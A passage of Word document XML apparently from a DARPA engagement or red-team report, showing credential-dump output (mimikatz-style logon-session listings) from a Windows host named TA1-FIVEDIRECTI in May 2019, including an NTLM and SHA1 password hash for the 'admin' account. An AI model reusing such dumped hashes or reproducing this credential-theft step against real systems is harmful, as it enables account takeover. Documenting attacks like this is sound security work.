      <w:r>
        <w:t>User Name         : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696FD31" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597C0702" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0625B923" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:54:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C2C48" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-21-231540947-922634896-4161786520-1004</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7BCBAE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B41A00F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         [00000003] Primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA65515" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1B0D94" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E49F7C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * NTLM     : 2b98b46fce607ebc2527666dc95cbecc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C74525" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * SHA1     : cf2a0e59c8dfd16e1064ecacbd74d50ddbfe4beb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB461E5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461C9D01" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C0114B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D645399" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE7D6E4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652BDF83" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A9A00" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0062E40C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD33F01" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F24EE5D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D96EAE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E77DDA8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="777F44B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 2053131 (00000000:001f540b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687BA2F3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Interactive from 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A274454" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : DWM-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75349C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : Window Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E704CAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A09AC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Logon Time        : 5/7/2019 1:52:50 PM                                                                                                                                                                                                                                                                                           [130/9592]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91E53F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-90-0-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1492F5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16567827" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C3E06" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF41518" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D9F3F0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F701D32" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1CED4A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC81FD4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B79C9BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3CC9DF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09196008" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 2053104 (00000000:001f53f0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D85DBAA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Interactive from 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0348CA8D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : DWM-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F22C5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : Window Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0035A51B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250BB681" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:52:50 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D654775" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-90-0-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41733E80" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D319D06" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361D7ED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA59CE8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8122DB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54231CB3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6210E3A7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA7BB3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7068496E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD60522" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C8FD314" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 2051605 (00000000:001f4e15)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A16522" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Interactive from 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB18C0A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : UMFD-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C56286F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : Font Driver Host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A0B22" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2969E4E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:52:50 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7F4BAE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-96-0-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54874347" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642CD84D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2772F630" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B5EB7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Username : TA1-FIVEDIRECTI$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4D4CB3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Domain   : WORKGROUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C844E0A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         * Password : (null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB2A3C9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02421ACF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B20EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFB5155" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A6C18EC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 411869 (00000000:000648dd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004F711" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Interactive from 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39871F24" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : darpa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC28B5D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356915C0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B742B9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:41:45 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9D6BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-21-231540947-922634896-4161786520-1001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6FED0C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E5BDC6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        tspkg :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AE3BA9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        wdigest :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353376FF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        kerberos :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1268DBBF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        ssp :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC2F052" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        credman :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A73FF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A90E14B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication Id : 0 ; 411838 (00000000:000648be)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631FC40C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Session           : Interactive from 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B0FD57" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>User Name         : darpa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F3CB8C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Domain            : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D484A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Server      : TA1-FIVEDIRECTI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF145B1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Logon Time        : 5/7/2019 1:41:45 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390B8765" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>SID               : S-1-5-21-231540947-922634896-4161786520-1001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A55FD58" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        msv :                                                                                                                                                                                                                                                                                                                      [63/9592]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4CFAB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
